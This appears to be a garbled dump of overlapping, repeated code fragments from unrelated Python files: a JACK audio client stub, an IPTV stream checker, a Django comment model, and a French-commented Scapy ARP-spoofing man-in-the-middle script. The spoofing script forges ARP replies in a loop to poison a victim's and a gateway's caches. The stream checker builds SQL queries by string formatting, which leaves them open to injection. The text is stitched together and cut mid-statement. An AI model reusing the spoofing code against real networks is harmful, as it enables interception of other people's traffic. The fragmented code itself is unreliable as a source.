# ---ESTABLISH SOCKET CONNECTION WITH", "cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work", "= process.communicate() return output, error if __name__ == \"__main__\": # nice opening message", "threading import Thread import jack class Client(): def __init__(self): #@todo: # ---ESTABLISH SOCKET", "output, error = self.runbash(cmd) else: cmd = 'jackd -d net' output, error =", "have some identifying label - #figure it out ... here pretend it's TOKEN", "self.runbash(cmd) else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe", "return output, error if __name__ == \"__main__\": # nice opening message print('\\n') print('---------------------------------------')", "realtime flag? #start jack client to manage connections jclient = jack.Client('JackClient') #wait for", "opening message print('\\n') print('---------------------------------------') print('-----------C-O-D-E-C-A-S-T-------------') print('-----------------v1.0------------------') print('---------------------------------------') print('-------(c) <NAME> 2018----------') print('---------------------------------------') print('------------~client edition~-----------')", "net backend cmd0 = 'ijo=$(ps -ef | grep jackd); if [[ $ijo ==", "else: cmd = 'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't", "#@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED, PROCEED--- #", "# # ---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend", "netjack channel, #name of net port will have some identifying label - #figure", "etc. def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return", "server to verify netjack RUNNING #look at ports, find incoming netjack channel, #name", "it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p = jclient.get_ports('system:playback_*')", "#figure it out ... here pretend it's TOKEN net_in_p = jclient.get_ports('*TOKEN*') sys_out_p =", "net_in_p to system out #print something to cmd line - hostname, time up,", "output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R realtime flag? #start", "sys_out_p = jclient.get_ports('system:playback_*') # connect net_in_p to system out #print something to cmd", "import os, subprocess from socket import * from threading import Thread import jack", "---ONCE ESTABLISHED, PROCEED--- # #slave - open jackd with net backend cmd0 =", "def runbash(self, cmd): process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE) output, error = process.communicate() return output,", "'jackd -d net' output, error = self.runbash(cmd) #ISSUE: maybe doesn't work without -R", "def __init__(self): #@todo: # ---ESTABLISH SOCKET CONNECTION WITH SERVER--- # # ---ONCE ESTABLISHED,", "net port will have some identifying label - #figure it out ... here" ]
[ "int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems =", "0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] =", "threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) > 0:", "0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount'] +=", "ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools()", "= netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item)", "sql = \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url'])", "coding: utf-8 -*- import tools import time import db import threading from .threads", "-*- coding: utf-8 -*- import tools import time import db import threading from", "class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now", "(item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else", "% (DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else", "= self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self,", "for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def", "def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info", "for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item):", "\"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result =", "%s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if", "ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self,", "if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' %", "= self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay'] =", ".threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T", "def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData,", "= self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info)", "item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and", "DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else: DB.edit(id,", "and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat =", "def checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s", "def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads =", "]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat", "0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB = db.DataBase()", "item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s'", "> 0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat ==", "result = DB.query(sql) if len(result) == 0 : DB.insert(data) else : id =", "base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() *", "item['failcount'] += 1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql", "import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T =", "= info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url'])", "db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table,", "* 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems()", "= DB.query(sql) if len(result) == 0 : DB.insert(data) else : id = result[0][0]", "DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now =", "import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\"", "pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for", "def addData (self, data) : DB = db.DataBase() sql = \"SELECT * FROM", "info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if", "sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in", "else 0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount']", "sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item =", "= db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\" %", "1 if netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now", "self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion()", "* FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql)", "self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[", "threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def", "> 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online']", "threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted()", "threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item", "= '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) == 0 :", "self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self):", "checkData(self, item): if 'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]:", "import time import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the", "= int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems", "= \"SELECT * FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result", "FROM %s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if", "(DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else :", "%s WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result)", "getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item", "+= 1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql =", "item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def addData", "self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self):", "in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url'", "db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for", "= 1 if netstat > 0 else 0 item['delay'] = netstat item['udTime'] =", "import tools import time import db import threading from .threads import ThreadPool class", "-*- import tools import time import db import threading from .threads import ThreadPool", "url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) == 0", "1000) def getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads", "import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class", "%s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat >", "time import db import threading from .threads import ThreadPool class DetectorBase(object): \"\"\"the base", "getItems(self): pass def onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20)", "self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1", "== 0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10:", "def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass", "\"\"\"the base class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time()", "% (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0", "data) : DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url", "(self, data) : DB = db.DataBase() sql = \"SELECT * FROM %s WHERE", "tools import time import db import threading from .threads import ThreadPool class DetectorBase(object):", "netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat", "= tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass", "self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay'] = netstat", "len(result) == 0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >=", "netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB", "self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self, data)", "== 0: item['failcount'] += 1 self.addData(item) def addData (self, data) : DB =", "utf-8 -*- import tools import time import db import threading from .threads import", "__init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def", "'url' in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'],", "len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat = self.T.chkPlayable(item['url'])", "DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url = '%s'\"", "0 else 0 item['delay'] = netstat item['udTime'] = self.now if netstat == 0:", "item['delay'] = netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1", "item['online'] = 1 if netstat > 0 else 0 item['delay'] = netstat item['udTime']", ": DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else:", "1 self.addData(item) def addData (self, data) : DB = db.DataBase() sql = \"SELECT", "netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0 item['delay']", "tools.Tools() self.now = int(time.time() * 1000) def getItems(self): pass def onCompleted(self): pass def", "netstat item['udTime'] = self.now if netstat == 0: item['failcount'] += 1 self.addData(item) def", "WHERE url = '%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) ==", ": DB = db.DataBase() sql = \"SELECT * FROM %s WHERE url =", "DB.query(sql) if len(result) == 0 : DB.insert(data) else : id = result[0][0] if", "addData (self, data) : DB = db.DataBase() sql = \"SELECT * FROM %s", "onCompleted(self): pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in", "self.addData(item) def addData (self, data) : DB = db.DataBase() sql = \"SELECT *", "item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url'])) netstat", "'%s'\" % (DB.table, data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data)", "0 : DB.insert(data) else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id)", "in item and len(item['url']) > 0: self.T.logger('正在分析[ %s ]: %s' % (item['name'], item['url']))", "= ThreadPool(20) for info in sourceItems: threads.add_task(self.checkData, item = info) threads.wait_completion() self.onCompleted() def", "info) threads.wait_completion() self.onCompleted() def checkData(self, item): if 'url' in item and len(item['url']) >", "from .threads import ThreadPool class DetectorBase(object): \"\"\"the base class for detecting\"\"\" def __init__(self):", "# -*- coding: utf-8 -*- import tools import time import db import threading", "if netstat == 0: item['failcount'] += 1 self.addData(item) def addData (self, data) :", "if len(result) == 0 : DB.insert(data) else : id = result[0][0] if data['failcount']", "detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000) def getItems(self):", "else : id = result[0][0] if data['failcount'] >= 10: DB.delete(id) else: DB.edit(id, data)", "pass def getSource(self): sourceItems = self.getItems() threads = ThreadPool(20) for info in sourceItems:", "data['url']) result = DB.query(sql) if len(result) == 0 : DB.insert(data) else : id", "class for detecting\"\"\" def __init__(self): self.T = tools.Tools() self.now = int(time.time() * 1000)", "item['url'])) netstat = self.T.chkPlayable(item['url']) item['online'] = 1 if netstat > 0 else 0", "if netstat > 0 else 0 item['delay'] = netstat item['udTime'] = self.now if" ]
[ "import models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment", "from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post", "from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post class", "model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\"", "models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for", "Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"]", "from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table", "\"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE,", "class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering =", "apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table =", "models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self): return self.text", "for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post =", "coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models", "\"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author", "import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\"", "post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self):", "= \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200)", "# -*- coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel", "utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import", "= [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20)", "django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel):", "[\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def", "db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text =", "ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author =", "-*- coding: utf-8 -*- from django.db import models from model_utils.models import TimeStampedModel from", "\"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post", "= models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text = models.CharField(max_length=200) author = models.CharField(max_length=20) def __str__(self): return", "Post \"\"\" class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post,", "import TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class", "TimeStampedModel from apps.post.models import Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta:", "Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\") text", "-*- from django.db import models from model_utils.models import TimeStampedModel from apps.post.models import Post", "Post class Comment(TimeStampedModel): \"\"\"Comment for Post \"\"\" class Meta: db_table = \"comment\" ordering", "class Meta: db_table = \"comment\" ordering = [\"-created\"] post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"comments\")" ]
[ "srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2, #", "(envoyés, reçus) des answers (réponses). for snd, rcv in ans: # On renvoie", "adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST,", "snd, rcv in ans: # On renvoie l'adresse MAC de la réponse reçue.", "MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une", "as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec", "à broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une réponse", "# build construit un paquet ARP à destination de `pdst` pour lui dire", "pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le", "l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except", "psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip,", "obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__", "build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac", "get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de", "victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse", "iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) #", "Faisons croire à pdst que psrc est à l'adresse MAC hwsrc (qui est", "l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux.", "construit notre paire de restauration. # i.e. on reconnecte le routeur et la", "return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches", "une paire de paquets ARP où gate = routeur et victim = victime.", "e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de", "envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL)", "entre deux paquets. # On itère sur les couples (envoyés, reçus) des answers", "# Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils", "= \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à", "On construit notre paire de restauration. # i.e. on reconnecte le routeur et", "l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien à", "a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst,", "\"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC", "gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP", "= gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP à", "gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire", "def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP.", "La paire retournée sont deux paquets (p1, p2). p1 est un paquet ARP", "paquets. # On itère sur les couples (envoyés, reçus) des answers (réponses). for", "answers (réponses). for snd, rcv in ans: # On renvoie l'adresse MAC de", "paquet ARP à destination de `pdst` pour lui dire que `psrc` a pour", "échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de", "Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip,", "associée à l'IP par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip),", "de paquets ARP où gate = routeur et victim = victime. La paire", "except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\")", "le réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie au", "victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE", "i.e. on reconnecte le routeur et la victime entre eux. for_gate, for_victim =", "bien à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac =", "\"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP", "MAC associée à l'IP par une requête ARP. \"\"\" ans, unans = srp(", "gate_info victim_mac, victim_ip = victim_info # build construit un paquet ARP à destination", "ans: # On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def", "inter=0.1) # intervalle entre deux paquets. # On itère sur les couples (envoyés,", "interne de VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur", "hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst)", "= get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. #", "routeur et victim = victime. La paire retournée sont deux paquets (p1, p2).", "build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP", "paquet ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant", "hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse MAC hwsrc", "le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt:", "in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau", "construit un paquet ARP à destination de `pdst` pour lui dire que `psrc`", "intervalle entre deux paquets. # On itère sur les couples (envoyés, reçus) des", "(qui est la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst", "# un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on", "que psrc est à l'adresse MAC hwsrc (qui est la nôtre en fait)", "de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses", "paire retournée sont deux paquets (p1, p2). p1 est un paquet ARP qui", "sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie", "cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible", "victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère", "itère sur les couples (envoyés, reçus) des answers (réponses). for snd, rcv in", "ARP qui dit au routeur qu'il doit s'occuper de la victime. p2 est", "au sens de, on envoie 7 fois le paquet pour être sûr qu'ils", "paire de paquets ARP où gate = routeur et victim = victime. La", "couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans: # On", "ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster", "CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici on", "être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de", "croire à pdst que psrc est à l'adresse MAC hwsrc (qui est la", "build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie", "p2 est un paquet ARP qui dit à la victime qu'il doit maintenant", "# (ici on crie au sens de, on envoie 7 fois le paquet", "de la victime. p2 est un paquet ARP qui dit à la victime", "(ici on crie au sens de, on envoie 7 fois le paquet pour", "rcv in ans: # On renvoie l'adresse MAC de la réponse reçue. return", "for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout,", "(ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets.", "des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On", "renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\"", "victim_mac, victim_ip = victim_info # build construit un paquet ARP à destination de", "gate = routeur et victim = victime. La paire retournée sont deux paquets", "la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build", "discuter avec le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip", "in ans: # On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\")", "= srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2,", "(MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break", "`psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2,", "On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info):", "HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def", "reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP", "timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface, # interface", "MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc)", "return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC", "de restauration. # i.e. on reconnecte le routeur et la victime entre eux.", "Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure", "= get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on reconnecte", "routeur qu'il doit s'occuper de la victime. p2 est un paquet ARP qui", "paquets ARP où gate = routeur et victim = victime. La paire retournée", "quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info #", "victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que", "True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ == '__main__':", "= build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on", "import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip =", "gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée", "cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de", "la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!]", "on reconnecte le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac,", "en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware)", "les couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans: #", "get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on reconnecte le", "vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à", "deux paquets. # On itère sur les couples (envoyés, reçus) des answers (réponses).", "victim_info): \"\"\" Crée une paire de paquets ARP où gate = routeur et", "paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\"", "et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for", "victim_ip = victim_info # build construit un paquet ARP à destination de `pdst`", "unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP 